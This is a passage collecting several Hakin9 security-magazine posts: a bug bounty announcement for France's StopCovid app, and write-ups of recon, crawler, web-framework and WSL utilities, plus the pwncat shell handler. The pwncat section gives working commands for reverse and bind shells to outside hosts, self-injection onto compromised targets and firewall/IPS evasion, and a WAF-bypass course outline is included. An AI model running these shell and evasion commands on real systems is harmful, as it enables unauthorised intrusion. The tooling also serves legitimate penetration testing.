Second step for France’s COVID-19 contact tracing app which goes on a public Bug Bounty programme.

Paris – June 3rd, 2020 - YesWeHack, Europe’s Bug Bounty leader, announced the beginning of a public Bug Bounty programme for StopCovid, France’s official app in the fight against the spread of COVID-19. From today, the 15,000+ ethical hackers of the YesWeHack platform, spread across more than 120 countries, will be able to search for vulnerabilities in the application.

The public bug bounty programme follows a week-long private one where 35 European ethical hackers investigated all components of the app. As StopCovid goes to end users, the public bug bounty programme opens up. France is the first country to ensure continuous security for its contact tracing app through bug bounty.

A few minor bugs were discovered during the private phase

All the vulnerabilities identified were reported to the StopCovid project team. Out of the 12 bugs identified in the YesWeHack program, 7 were accepted as being within the scope of the Bug Bounty or being of general interest: 5 minor to moderate security bugs, not allowing any immediate compromising of phones, infrastructure or data generated by the application, and 2 functional bugs. Corrections are underway and all accepted bugs have been reported on Inria’s Gitlab, the StopCovid project team’s bug tracker.

Public phase: strengthen the vulnerability hunt

StopCovid is officially accessible to all in France starting 2 June. According to the timeline set between the StopCovid consortium and YesWeHack, the public bug bounty programme opens on the same date. The vulnerability hunt is thus accessible to the 15,000-plus ethical hackers of the YesWeHack platform. Hackers from around the world will thus be able to help France strengthen the security of its application. The programme rules and perimeters are adapted accordingly.

With this second step, the StopCovid project team underlines the crucial role of crowdsourced security for data protection in the fight against COVID-19 – and how bug bounty can help build trust and transparency. Check out the public programme here.

About YesWeHack

Founded in 2013, YesWeHack is the #1 European Bug Bounty & VDP Platform. YesWeHack offers companies an innovative approach to cybersecurity with Bug Bounty (pay-per-vulnerability discovered), connecting more than 15,000 cyber-security experts (ethical hackers) across 120 countries with organisations to secure their exposed scopes and reporting vulnerabilities in their websites, mobile apps, infrastructure and connected devices. YesWeHack runs private (invitation-only) programmes, public programmes and vulnerability disclosure policies (VDP) for hundreds of worldwide organisations in compliance with the strictest European regulations.

The post France's COVID-19 contact tracing app is now tested by 15,000+ ethical hackers appeared first on Hakin9 - IT Security Magazine.

Sudomy - Subdomain Enumeration and Analysis Tool


Sudomy is a subdomain enumeration tool, created using a bash script, to analyze domains and collect subdomains in a fast and comprehensive way.

Features

As of now, Sudomy has these 13 features:

  • Easy, light, fast, and powerful. Bash is available by default in almost all Linux distributions, and by using bash's multiprocessing feature, all processors will be utilized optimally.
  • The subdomain enumeration process can be carried out using an active method or a passive method
    • Active Method
      • Sudomy utilizes Gobuster because of its high-speed performance in carrying out DNS subdomain brute-force attacks (with wildcard support). The wordlist used comes from combined SecLists (Discovery/DNS) lists, which contain around 3 million entries
    • Passive Method
      • By selecting good third-party sites, the enumeration process can be optimized: more results are obtained in less time. Sudomy can collect data from these 20 well-curated third-party sites:
          https://dnsdumpster.com
          https://web.archive.org
          https://shodan.io
          https://virustotal.com
          https://crt.sh
          https://www.binaryedge.io
          https://securitytrails.com
          https://sslmate.com/certspotter
          https://censys.io
          https://threatminer.org
          http://dns.bufferover.run
          https://hackertarget.com
          
          https://www.threatcrowd.org
          https://riddler.io
          https://findsubdomains.com
          https://rapiddns.io/
          https://otx.alienvault.com/
          https://index.commoncrawl.org/
          https://urlscan.io/
        
  • Test the list of collected subdomains and probe for working HTTP or HTTPS servers. This feature uses a third-party tool, httprobe.
  • Subdomain availability test based on a ping sweep and/or by getting the HTTP status code.
  • The ability to detect virtual hosts (several subdomains that resolve to a single IP address). Sudomy will resolve the collected subdomains to IP addresses, then group the subdomains that resolve to a single IP address. This feature is very useful for the subsequent penetration testing/bug bounty process; for instance, in port scanning, a single IP address won't be scanned repeatedly.
  • Perform port scanning on the IP addresses of collected subdomains/virtual hosts.
  • Test for subdomain takeover.
  • Take screenshots of subdomains.
  • Identify technologies on websites.
  • Collect/scrape open ports from third-party sources (default: Shodan; Censys and Zoomeye may follow). It is more efficient and effective to collect open ports for the list of target IPs this way [[ Subdomain > IP Resolver > Crawling > ASN & Open Port ]].
  • Collect juicy URLs & extract URL parameters (default resources: WebArchive, CommonCrawl, UrlScanIO).
  • Define the path for the output file (specify an output file when completed).
  • Report output in HTML & CSV format.

How Sudomy Works

Sudomy uses the cURL library to fetch the HTTP response body from third-party sites and then runs regular expressions against it to extract subdomains. This process fully leverages multiple processors, so more subdomains are collected in less time.
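
To illustrate the passive technique in miniature (a Python sketch of the general idea, fetch a third-party source and regex out subdomains, not Sudomy's bash implementation; crt.sh is one of the sources listed above):

#!/usr/bin/env python3
# Toy version of the passive method: fetch certificate-transparency data for a
# domain from crt.sh and extract subdomains with a regular expression.
import re
import urllib.request

def passive_subdomains(domain):
    url = f"https://crt.sh/?q=%25.{domain}&output=json"
    with urllib.request.urlopen(url, timeout=30) as response:
        body = response.read().decode("utf-8", errors="replace")
    pattern = re.compile(r"[\w.-]+\." + re.escape(domain))
    return sorted(set(match.lower() for match in pattern.findall(body)))

if __name__ == "__main__":
    for subdomain in passive_subdomains("example.com"):
        print(subdomain)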

Publication

User Guide

Comparison

The following are the results of passive DNS enumeration testing of Sublist3r, Subfinder, and Sudomy. The domain used in this comparison is bugcrowd.com.


More: https://github.com/Screetsec/Sudomy

The post Sudomy - Subdomain Enumeration and Analysis Tool appeared first on Hakin9 - IT Security Magazine.

Flash Framework - a high performance, open source web application framework for hackers


Flash is a high-performance, open-source web application framework. Flash follows the MVT (Model-View-Template) architectural pattern, which you can also think of as the MVC (Model-View-Controller) pattern where the controller is handled by the framework itself. Flash is fast, lightweight, powerful, simple, and easy to use.

It allows users to create web applications in an easy and simple way, and within the framework users can create their own services and libraries.

Features

  • Fast and powerful web framework.
  • Extremely Light Weight.
  • MVT Architecture.
  • You can build RESTful APIs faster.
  • Security and XSS Filtering.
  • Simple and easy to learn.
  • Easy to deploy on any server.

Flash architecture

The Flash web framework is based on the MVT (Model-View-Template) architecture, a software design pattern. The Model is the data access layer that handles the database. The Template is the presentation layer that handles the user interface. The View executes the business logic, interacts with the Model to carry data, and renders a Template.

Directory Structure of Flash

/system
/application
    /app
        /templates
        /models.php
        /views.php
        /urls.php
    /app1
    /app..n
    /templates
    /settings.php
    /urls.php
/.htaccess
/index.php

System directory

The system directory is the framework's core directory, where all the system files are stored.

Application directory

Application is the main project directory that contains all your apps and project files. You can change this default application directory to a different location by setting a new APP_DIR path in index.php. All your app project files (settings, URLs) should be inside the application directory.

App directory

The app is a demo application for your project. You can create new apps such as login, admin, news, blogs, or any app that you want. Your app directory contains the views, models, and URLs files.

Templates directory

The templates directory contains all your HTML template files.

Installation

The Flash web framework is written for PHP, so it requires PHP 5.6 or newer. You won't need to set up anything just yet.

Flash can be installed in a few steps:

  • Download the files.
  • Unzip the package.
  • Upload all the Flash folders and files (application, system, .htaccess, index.php) on the server.
  /public_html
      /application
      /system
      .htaccess
      index.php

That's it; in the web framework there is nothing to configure or set up. It's always ready to go.

For Linux

A quick setup for Linux and Android devices.

$ git clone https://github.com/rajkumardusad/flash
$ cd flash
$ php -S localhost:8080 index.php

That's it; in the Flash web framework there is nothing to configure or set up. It's always ready to go.

Simple Example

A simple Hello, World web application in the Flash web framework.

Create View

Let’s write the first view. Open the app/views.php file and put the following PHP code in it:

class view extends Views {

  function __construct() {
    parent::__construct();
  }

  function hello_world() {
    return $this->response("hello, world !!");
  }
}

The hello world view is created; now map this view to a URL.

Map URLs with Views

Let's create a URL and map it to the view. Open the app/urls.php file and put the following code in it:

//include views to route URLs
require_once("views.php");

$urlpatterns=[
  '/' => 'view.hello_world',
];

Now a simple hello world web app is created.

Documentation


More: https://github.com/rajkumardusad/flash

The post Flash Framework - a high performance, open source web application framework for hackers appeared first on Hakin9 - IT Security Magazine.

Bypassing WAFs with WAFNinja [FREE COURSE CONTENT]


In this video from our Bypassing Web Application Firewall course, your instructor, Thomas Sermpinis, shows how to install and use the popular WAFNinja tool. You can use it to automate web application firewall bypasses during your pentests. Let's go! 



Nowadays, the number of web application firewalls (or simply WAFs) is increasing, which makes penetration tests more difficult from our side. So it becomes essential to be able to bypass WAFs during a penetration test. In this course, we are going to examine practical approaches to bypassing WAFs as part of our penetration test and, of course, the theory behind WAFs and how they work.

What will you learn?

  • WAF Bypassing
  • How WAFs work
  • How to incorporate WAF bypassing into our penetration test

What skills will you gain?

  • WAF Bypassing and Hacking
  • WAF Hardening and Securing

Introduction WAFs, WAF Bypassing and techniques

In this module, we will quickly examine how WAFs work in a web server, and we will be introduced to WAF Bypassing and some interesting methods with practical examples, attacking web application firewalls with conventional methods.

  • Introduction to WAFs, WAF types and WAF Bypassing
  • WAF Fingerprinting
  • Automating WAF Fingerprinting with Burp, Nmap and wafw00f
  • WAF Bypassing, with tools like WAFninja

WAF Bypassing with SQL Injection

In module 2, we examine how we can bypass WAF by exploiting SQL Injection vulnerabilities, with various ways such as normalization and HTTP Parameter Pollution.

  • HTTP Parameter Pollution – HPP
  • Encoding Techniques for Bypassing WAF
  • Bypassing WAF with SQL Injection
  • HTTP Parameter Fragmentation – HPF
  • Bypassing WAFs with SQL Injection Normalization
  • Buffer Overflow + SQL Injection = Bypass WAF

WAF Bypassing with XSS and RFI

In module 3, we will examine more ways of WAF Bypassing, this time containing the Remote File Inclusion and the Cross-Site Scripting and more.

  •  Cross Site Scripting - XSS
  • Reflected Cross Site Scripting
  • Stored Cross-site Scripting
  • Path Traversal
  • Remote and Local File Inclusion

Securing WAF and Conclusion

Finally, in module 4, we will see some final methods for bypassing WAFs, and prevention methods with practical examples for our WAF implementations.

  • DOM Based XSS
  • Bypassing Blacklists with JavaScript
  • Automating WAF Bypassing
  • Bypassing WAF Practical Examples (Imperva WAF, Aqtronix WebKnight WAF, ModSecurity WAF, and others)
  • Conclusion and final exam


The post Bypassing WAFs with WAFNinja [FREE COURSE CONTENT] appeared first on Hakin9 - IT Security Magazine.


Photon - Incredibly fast crawler designed for OSINT


Photon is a relatively fast crawler designed for automating OSINT (Open Source Intelligence), with a simple interface and tons of customization options. It's written in Python. Photon essentially acts as a web crawler that can extract URLs with parameters (and fuzz them), secret AUTH keys, and a lot more.

Compatibility

Python Versions

Photon is fully compatible with Python versions 2.x - 3.x at present but will most likely end up deprecating python2.x support in the future as this project is under heavy development and may require features that aren't available in python2.

Operating Systems

Photon has been tested on Linux (Arch, Debian, Ubuntu), Termux, Windows (7 & 10), Mac, and works as expected. Feel free to report any bugs you encounter.

Colors

Mac & Windows don't support ANSI escape sequences so the output won't be colored on Mac & Windows.

Dependencies

  • TLD
  • requests

The rest of the python libraries used by Photon are standard libraries that come preinstalled with a python interpreter.

Installing Photon

To install Photon all you have to do is clone the Github repository, install the dependencies, and run the script.

git clone https://github.com/s0md3v/photon.git

Key Features

Data Extraction

Photon can extract the following data while crawling:

  • URLs (in-scope & out-of-scope)
  • URLs with parameters (example.com/gallery.php?id=2)
  • Intel (emails, social media accounts, amazon buckets etc.)
  • Files (pdf, png, xml etc.)
  • Secret keys (auth/API keys & hashes)
  • JavaScript files & Endpoints present in them
  • Strings matching custom regex pattern
  • Subdomains & DNS related data

The extracted information is saved in an organized manner or can be exported as json.

Flexible

Control timeout, delay, add seeds, exclude URLs matching a regex pattern and other cool stuff. The extensive range of options provided by Photon lets you crawl the web exactly the way you want.

Genius

Photon's smart thread management & refined logic gives you top-notch performance.

Still, crawling can be resource-intensive, but Photon has some tricks up its sleeve. You can fetch URLs archived by archive.org to be used as seeds by using the --wayback option.

Plugins

Docker

Photon can be launched using a lightweight Python-Alpine (103 MB) Docker image.

$ git clone https://github.com/s0md3v/Photon.git
$ cd Photon
$ docker build -t photon .
$ docker run -it --name photon photon:latest -u google.com

To view results, you can either head over to the local docker volume, which you can find by running docker inspect photon, or by mounting the target loot folder:

$ docker run -it --name photon -v "$PWD:/Photon/google.com" photon:latest -u google.com

Frequent & Seamless Updates

Photon is under heavy development; updates for fixing bugs, optimizing performance & adding new features are rolled out regularly.

If you would like to see features and issues that are being worked on, you can do that on the Development project board.

Updates can be installed & checked for with the --update option. Photon has seamless update capabilities which means you can update Photon without losing any of your saved data.

Usage

usage: photon.py [options]

  -u --url              root url
  -l --level            levels to crawl
  -t --threads          number of threads
  -d --delay            delay between requests
  -c --cookie           cookie
  -r --regex            regex pattern
  -s --seeds            additional seed urls
  -e --export           export formatted result
  -o --output           specify output directory
  -v --verbose          verbose output
  --keys                extract secret keys
  --clone               clone the website locally
  --exclude             exclude urls by regex
  --stdout              print a variable to stdout
  --timeout             http requests timeout
  --ninja               ninja mode
  --update              update photon
  --headers             supply http headers
  --dns                 enumerate subdomains & dns data
  --only-urls           only extract urls
  --wayback             Use URLs from archive.org as seeds
  --user-agent          specify user-agent(s)

Crawl a single website

Option: -u or --url

Crawl a single website.

python photon.py -u "http://example.com"

Clone the website locally

Option: --clone

The crawled webpages can be saved locally for later use by using the --clone switch as follows:

python photon.py -u "http://example.com" --clone

Depth of crawling

Option: -l or --level | Default: 2

Using this option, the user can set a recursion limit for crawling. For example, a depth of 2 means Photon will find all the URLs from the homepage and seeds (level 1) and then crawl those URLs as well (level 2).

python photon.py -u "http://example.com" -l 3

Number of threads

Option: -t or --threads | Default: 2

It is possible to make concurrent requests to the target, and the -t option can be used to specify the number of concurrent requests to make. While threads can help speed up crawling, they might also trigger security mechanisms. A high number of threads can also bring down small websites.

python photon.py -u "http://example.com" -t 10

The delay between each HTTP request

Option: -d or --delay | Default: 0

It is possible to specify the number of seconds to wait between each HTTP(S) request. The value must be an integer; for instance, 1 means one second.

python photon.py -u "http://example.com" -d 2

Timeout

Option: --timeout | Default: 5

It is possible to specify the number of seconds to wait before considering the HTTP(S) request timed out.

python photon.py -u "http://example.com --timeout=4

Cookies

Option: -c or --cookie | Default: no cookie header is sent

This option lets you add a Cookie header to each HTTP request made by Photon in non-ninja mode.
It can be used when certain parts of the target website require authentication based on Cookies.

python photon.py -u "http://example.com" -c "PHPSESSID=u5423d78fqbaju9a0qke25ca87"

Specify the output directory

Option: -o or --output | Default: domain name of target

Photon saves the results in a directory named after the domain name of the target, but you can override this behavior by using this option.

python photon.py -u "http://example.com" -o "mydir"

Verbose output

Option: -v or --verbose

In verbose mode, all the pages, keys, files, etc. will be printed as they are found.

python photon.py -u "http://example.com" -v

Exclude specific URLs

Option: --exclude

URLs matching the specified regex will not be crawled or shown in the results at all.

python photon.py -u "http://example.com" --exclude="/blog/20[17|18]"

Specify seed URL(s)

Option: -s or --seeds

You can add custom seed URL(s) with this option, separated by commas.

python photon.py -u "http://example.com" --seeds "http://example.com/blog/2018,http://example.com/portals.html"

Specify user-agent(s)

Option: --user-agent | Default: entries from user-agents.txt

You can use your own user agent(s) with this option, separated by commas.

python photon.py -u "http://example.com" --user-agent "curl/7.35.0,Wget/1.15 (linux-gnu)"

This option is only present to aid the user to use a specific user agent without modifying the default user-agents.txt file.

Custom regex pattern

Option: -r or --regex

It is possible to extract strings during crawling by specifying a regex pattern with this option.

python photon.py -u "http://example.com" --regex "\d{10}"

Export formatted result

Option: -e or --export

With the -e option you can specify an output format in which the data will be saved.

python photon.py -u "http://example.com" --export=json

Currently supported formats are:

  • JSON
  • CSV

Use URLs from archive.org as seeds

Option: --wayback

This option makes it possible to fetch archived URLs from archive.org and use them as seeds. Only the URLs crawled within the current year will be fetched to make sure they aren't dead.

python photon.py -u "http://example.com" --wayback

Skip data extraction

Option: --only-urls

This option skips the extraction of data such as intel and js files. It should come in handy when your goal is to only crawl the target.

python photon.py -u "http://example.com" --only-urls

Update

Option: --update

If this option is enabled, Photon will check for updates. If a newer version is available, Photon will download and merge the updates into the current directory without overwriting other files.

python photon.py --update

Extract secret keys

Option: --keys

This switch tells Photon to look for high-entropy strings, which can be some kind of auth or API keys or hashes.

python photon.py -u http://example.com --keys
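
High entropy is a simple heuristic for spotting keys and hashes; a rough Python sketch of the idea (not Photon's implementation) looks like this:

#!/usr/bin/env python3
# Sketch of the high-entropy heuristic: compute Shannon entropy per token read
# from stdin and print the long, random-looking ones (key/hash candidates).
import math
import sys

def shannon_entropy(text):
    if not text:
        return 0.0
    probabilities = [text.count(ch) / len(text) for ch in set(text)]
    return -sum(p * math.log2(p) for p in probabilities)

for token in sys.stdin.read().split():
    entropy = shannon_entropy(token)
    if len(token) >= 20 and entropy > 4.0:
        print(f"{entropy:.2f}  {token}")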

Piping (Writing to stdout)

Option: --stdout

You can write a variety of choices to stdout for piping with other programs.
The following variables are supported:

files, intel, robots, custom, failed, internal, scripts, external, fuzzable, endpoints, keys

python photon.py -u http://example.com --stdout=custom | resolver.py
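
The resolver.py in the example above is not part of Photon; a minimal, hypothetical version that reads hostnames from stdin and prints the ones that resolve could look like this:

#!/usr/bin/env python3
# Hypothetical resolver.py: read hostnames piped in on stdin (for example from
# "photon.py --stdout=custom") and print those that resolve, with their IPs.
import socket
import sys

for line in sys.stdin:
    host = line.strip()
    if not host:
        continue
    try:
        address = socket.gethostbyname(host)
    except socket.gaierror:
        continue  # skip hosts that do not resolve
    print(f"{host} {address}")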

Ninja Mode

Option: --ninja

This option enables Ninja mode. In this mode, Photon uses the following websites to make requests on your behalf.

Contrary to the name, it doesn't stop you from making requests to the target.

Dumping DNS data

Option: --dns

Saves subdomains in 'subdomains.txt' and also generates an image displaying the target domain's DNS data.

python photon.py -u http://example.com --dns

Sample Output:

Contribution & License

You can contribute in the following ways:

  • Report bugs
  • Develop plugins
  • Add more "APIs" for ninja mode
  • Give suggestions to make it better
  • Fix issues & submit a pull request

Please read the guidelines before submitting a pull request or issue.

Do you want to have a conversation in private? Hit me up on my twitter, the inbox is open :)

The post Photon - Incredibly fast crawler designed for OSINT appeared first on Hakin9 - IT Security Magazine.

wslu - A collection of utilities for Windows 10 Linux Subsystems


wslu is a collection of utilities for the Windows 10 Linux Subsystem, such as retrieving Windows 10 environment variables or creating your favorite Linux GUI application shortcuts on the Windows 10 Desktop.

Requires Windows 10 Creators Update. Some of the features require a higher version of Windows 10. Supports WSL2.

Feature

wslusc

A WSL shortcut creator to create a shortcut on your Windows 10 Desktop.

wslsys

A WSL system information printer to print out system information from Windows 10 or WSL.

wslfetch

A WSL screenshot information tool to print information in an elegant way.

wslvar

A WSL tool to help you get Windows system environment variables.

wslview

With alias wview/wslstart/wstart

A fake WSL browser that can help you open links in the default Windows browser or open files on Windows.

wslupath

⚠ Deprecated

A WSL tool to convert path styles.

wslact

A set of quick actions for WSL such as quickly mounting all drives or manually sync time between Windows and WSL.

Installation

Alpine Linux

You can install wslu from Alpine Linux community with the following command:

$ echo "@testing http://dl-cdn.alpinelinux.org/alpine/edge/community/" | sudo tee -a /etc/apk/repositories
$ sudo apk update
$ sudo apk add wslu@testing

Arch Linux

wslu and wslu-git on AUR.

CentOS/RHEL

Add the repository for the corresponding Linux distribution:

  • CentOS 7: sudo yum-config-manager --add-repo https://download.opensuse.org/repositories/home:/wslutilities/CentOS_7/home:wslutilities.repo
  • CentOS 8: sudo yum-config-manager --add-repo https://download.opensuse.org/repositories/home:/wslutilities/CentOS_8/home:wslutilities.repo
  • Red Hat Enterprise Linux 7: sudo yum-config-manager --add-repo https://download.opensuse.org/repositories/home:/wslutilities/RHEL_7/home:wslutilities.repo

Then install with the command sudo yum install wslu.

Debian

You can install wslu with the following command:

sudo apt install gnupg2 apt-transport-https
wget -O - https://access.patrickwu.space/wslu/public.asc | sudo apt-key add -
echo "deb https://access.patrickwu.space/wslu/debian buster main" | sudo tee -a /etc/apt/sources.list
sudo apt update
sudo apt install wslu

Fedora Remix

You can install wslu from COPR with the following command:

sudo dnf copr enable wslutilities/wslu
sudo dnf install wslu

Kali Linux

You can install wslu with the following command:

sudo apt install gnupg2 apt-transport-https
wget -O - https://access.patrickwu.space/wslu/public.asc | sudo apt-key add -
echo "deb https://access.patrickwu.space/wslu/kali kali-rolling main" | sudo tee -a /etc/apt/sources.list
sudo apt update
sudo apt install wslu

Pengwin

Preinstalled.

Pengwin Enterprise

You can install wslu with the following command:

sudo yum-config-manager --add-repo https://download.opensuse.org/repositories/home:/wslutilities/ScientificLinux_7/home:wslutilities.repo
sudo yum install wslu

Ubuntu

Attention!

The Ubuntu version of wslu is a modified version. You should report bugs here.

Preinstalled in the latest apps. On older installations of Ubuntu, please install ubuntu-wsl, which depends on wslu:

sudo apt update
sudo apt install ubuntu-wsl

OpenSUSE

You can install wslu with the following command:

sudo zypper addrepo https://download.opensuse.org/repositories/home:/wslutilities/openSUSE_Leap_15.1/home:wslutilities.repo
sudo zypper up
sudo zypper in wslu

SUSE Linux Enterprise Server

You can install wslu with the following command:

SLESCUR_VERSION="$(grep VERSION= /etc/os-release | sed -e s/VERSION=//g -e s/\"//g -e s/-/_/g)"
sudo zypper addrepo https://download.opensuse.org/repositories/home:/wslutilities/SLE_$SLESCUR_VERSION/home:wslutilities.repo
sudo zypper addrepo https://download.opensuse.org/repositories/graphics/SLE_12_SP3_Backports/graphics.repo
sudo zypper up
sudo zypper in wslu

Other distributions

⚠ Not Recommended

The curl | bash method is not secure. Related article

You can install wslu with the following command on your preferred distribution: curl -sL https://raw.githubusercontent.com/wslutilities/wslu/master/extras/scripts/wslu-install | bash 


More: https://github.com/wslutilities/wslu

The post wslu - A collection of utilities for Windows 10 Linux Subsystems appeared first on Hakin9 - IT Security Magazine.

pwncat - netcat on steroids with Firewall, IDS/IPS evasion, and its fully scriptable with Python (PSE)


Pwncat is a sophisticated bind and reverse shell handler with many features, as well as a drop-in replacement or compatible complement to netcat, ncat, or socat.

Motivation

Ever accidentally hit Ctrl+c on your reverse shell and it was gone for good? Ever waited forever for your client to connect back to you because the firewall didn't let it out? Ever had a connection loss because an IPS closed suspicious ports? Ever been in need of quick port forwarding?

Apart from that, the current features of nc, ncat or socat just didn't meet my needs, and I also wanted to have a single tool that works on older and newer machines (hence Python 2+3 compat). Most importantly, I wanted to have it in a language that I can understand and extend with my own features. (Wait for it, binary releases for Linux, MacOS, and Windows will come shortly).

🎉 Install Pwncat

pip install pwncat

☕ TL;DR

This is just a quick get-you-started overview. For more advanced techniques see 💻 Usage or 💡 Examples.

See in action

Deploy to target

# Copy base64 data to clipboard from where you have internet access
curl https://raw.githubusercontent.com/cytopia/pwncat/master/bin/pwncat | base64

# Paste it on the target machine
echo "<BASE64 STRING>" | base64 -d > pwncat
chmod +x pwncat

Inject to target

# [1] If you found a vulnerability on the target to start a very simple reverse shell,
# such as via bash, php, perl, python, nc or similar, you can instruct your local
# pwncat listener to use this connection to deploy itself on the target automatically
# and start an additional unbreakable reverse shell back to you.
pwncat -l 4444 --self-inject /bin/bash:10.0.0.1:4445

[1] Read in more detail about self-injection

Summon shells

# Bind shell (accepts new clients after disconnect)
pwncat -l -e '/bin/bash' 8080 -k
# Reverse shell (Ctrl+c proof: reconnects back to you)
pwncat -e '/bin/bash' example.com 4444 --reconn --reconn-wait 1
# Reverse UDP shell (Ctrl+c proof: reconnects back to you)
pwncat -e '/bin/bash' example.com 4444 -u --ping-intvl 1

Port scan

# [TCP] IPv4 + IPv6
pwncat -z 10.0.0.1 80,443,8080
pwncat -z 10.0.0.1 1-65535
pwncat -z 10.0.0.1 1+1023

# [UDP] IPv4 + IPv6
pwncat -z 10.0.0.1 80,443,8080 -u
pwncat -z 10.0.0.1 1-65535 -u
pwncat -z 10.0.0.1 1+1023 -u

# Use only IPv6 or IPv4
pwncat -z 10.0.0.1 1-65535 -4
pwncat -z 10.0.0.1 1-65535 -6 -u

# Add version detection
pwncat -z 10.0.0.1 1-65535 --banner

Local port forward -L (listening proxy)

# Make remote MySQL server (remote port 3306) available on current machine
# on every interface on port 5000
pwncat -L 0.0.0.0:5000 everythingcli.org 3306
# Same, but convert traffic on your end to UDP
pwncat -L 0.0.0.0:5000 everythingcli.org 3306 -u

Remote port forward -R (double client proxy)

# Connect to Remote MySQL server (remote port 3306) and then connect to another
# pwncat/netcat server on 10.0.0.1:4444 and bridge traffic
pwncat -R 10.0.0.1:4444 everythingcli.org 3306
# Same, but convert traffic on your end to UDP
pwncat -R 10.0.0.1:4444 everythingcli.org 3306 -u

SSH Tunnelling for fun and profit 🔗
pwncat example: Port forwarding magic

⭐ Features

At a glance

pwncat has many features, below is only a list of outstanding characteristics.

Feature Description
PSE Fully scriptable with Pwncat Scripting Engine to allow all kinds of fancy stuff on send and receive
port scanning TCP and UDP port scanning with basic version detection support
Self-injecting rshell Self-injecting mode to deploy itself and start an unbreakable reverse shell back to you automatically
Bind shell Create bind shells
Reverse shell Create reverse shells
Port Forward Local and remote port forward (Proxy server/client)
Ctrl+c Reverse shell can reconnect if you accidentally hit Ctrl+c
Detect Egress Scan and report open egress ports on the target (port hopping)
Evade FW Evade egress firewalls by round-robin outgoing ports (port hopping)
Evade IPS Evade Intrusion Prevention Systems by being able to round-robin outgoing ports on connection interrupts (port hopping)
UDP rev shell Try this with the traditional netcat
Stateful UDP Stateful connect phase for UDP client mode
TCP / UDP Full TCP and UDP support
IPv4 / IPv6 Dual or single stack IPv4 and IPv6 support
Python 2+3 Works with Python 2, Python 3, pypy2 and pypy3
Cross OS Work on Linux, MacOS and Windows as long as Python is available
Compatibility Use netcat, ncat or socat as a client or server together with pwncat
Portable Single file which only uses core packages - no external dependencies required.

Feature comparison matrix

pwncat netcat ncat socat
Scripting engine ✔ Python ❌ ✔ Lua ❌
IP ToS ✔ ✔ ❌ ✔
IPv4 ✔ ✔ ✔ ✔
IPv6 ✔ ✔ ✔ ✔
Unix domain sockets ❌ ✔ ✔ ✔
Linux vsock ❌ ❌ ✔ ❌
Socket source bind ✔ ✔ ✔ ✔
TCP ✔ ✔ ✔ ✔
UDP ✔ ✔ ✔ ✔
SCTP ❌ ❌ ✔ ✔
SSL ❌ ❌ ✔ ✔
HTTP * ❌ ❌ ❌
HTTPS * ❌ ❌ ❌
Telnet negotiation ❌ ✔ ✔ ❌
Proxy support ❌ ✔ ✔ ✔
Local port forward ✔ ❌ ❌ ✔
Remote port forward ✔ ❌ ❌ ❌
Inbound port scan ✔ ✔ ✔ ❌
Outbound port scan ✔ ❌ ❌ ❌
Version detection ✔ ❌ ❌ ❌
Chat ✔ ✔ ✔ ✔
Command execution ✔ ✔ ✔ ✔
Hex dump * ✔ ✔ ✔
Broker ❌ ❌ ✔ ❌
Simultaneous conns ❌ ❌ ✔ ✔
Allow/deny ❌ ❌ ✔ ✔
Re-accept ✔ ✔ ✔ ✔
Self-injecting ✔ ❌ ❌ ❌
UDP reverse shell ✔ ❌ ❌ ❌
Respawning client ✔ ❌ ❌ ❌
Port hopping ✔ ❌ ❌ ❌
Emergency shutdown ✔ ❌ ❌ ❌

* Feature is currently under development.

👮 Behavior

Like the original implementation of netcat, when using TCP, pwncat (in client and listen mode) will automatically quit if the network connection has been terminated, properly or improperly. In case the remote peer does not terminate the connection, or in UDP mode, pwncat will stay open.

Have a look at the following commands to better understand this behavior:

# [Valid HTTP request] Does not quit, web server keeps connection intact
printf "GET / HTTP/1.1\n\n" | pwncat www.google.com 80
# [Invalid HTTP request] Quits, because the web server closes the connection
printf "GET / \n\n" | pwncat www.google.com 80
# [TCP]
# Neither of both, client and server will quit after successful transfer
# and they will be stuck, waiting for more input or output.
# When exiting one (e.g.: via Ctrl+c), the other one will quit as well.
pwncat -l 4444 > output.txt
pwncat localhost 4444 < input.txt
# [UDP]
# Neither of both, client and server will quit after successful transfer
# and they will be stuck, waiting for more input or output.
# When exiting one (e.g.: via Ctrl+c), the other one will still stay open in UDP mode.
pwncat -u -l 4444 > output.txt
pwncat -u localhost 4444 < input.txt

There are many ways to alter this default behavior. Have a look at the usage section for more advanced settings.

📕 Documentation

Documentation will evolve over time.

💻 Usage

Type pwncat -h or click below to see all available options.

💡 Examples

Upgrade your shell to interactive

This is a universal advice and not only works with pwncat, but with all other common tools.

When connected with a reverse or bind shell you'll notice that no interactive commands will work and hitting Ctrl+c will terminate your session. To fix this, you'll need to attach it to a TTY (make it interactive). Here's how:

python3 -c 'import pty; pty.spawn("/bin/bash")'

Ctrl+z

# get your current terminal size (rows and columns)
stty size

# for bash/sh (enter raw mode and disable echo'ing)
stty raw -echo
fg

# for zsh (enter raw mode and disable echo'ing)
stty raw -echo; fg

reset
export SHELL=bash
export TERM=xterm
stty rows <num> columns <cols>   # <num> and <cols> values found above by 'stty size'

[1] Reverse Shell Cheatsheet

UDP reverse shell

Without tricks, a UDP reverse shell is not really possible. UDP is a stateless protocol compared to TCP and does not have a connect() method as TCP does. In TCP mode, the server will know the client IP and port once the client issues a connect(). In UDP mode, as there is no connect(), the client simply sends data to an address/port without having to connect first. Therefore, in UDP mode, the server will not be able to know the IP and port of the client and hence cannot send data to it first. The only way to make this possible is to have the client send some sort of data to the server first, so that the server can see what IP/port has sent data to it.

pwncat emulates the TCP connect() by having the client send a null byte to the server once or periodically via --ping-intvl or --ping-init.

# The client
# --exec            # Provide this executable
# --udp             # Use UDP mode
# --ping-init       # Send an initial null byte to the server
pwncat --exec /bin/bash --udp --ping-init 10.0.0.1 4444
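
To see why that initial null byte matters, here is a stripped-down Python sketch of the mechanism (not pwncat's code): the server only learns the client's address once the client has sent something, and only then can it answer.

#!/usr/bin/env python3
# Toy demonstration of the UDP "connect" trick: the client announces itself
# with a null byte so the server learns its address and can send data back.
import socket
import sys

def server(port=4444):
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind(("0.0.0.0", port))
    data, client_addr = sock.recvfrom(1024)   # the null byte arrives here
    print("client announced itself from", client_addr)
    sock.sendto(b"id\n", client_addr)         # now the server can talk back

def client(host="127.0.0.1", port=4444):
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.sendto(b"\x00", (host, port))        # emulate a UDP "connect"
    command, _ = sock.recvfrom(1024)
    print("server sent:", command.decode(errors="replace"))

if __name__ == "__main__":
    server() if "server" in sys.argv else client()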

Unbreakable TCP reverse shell

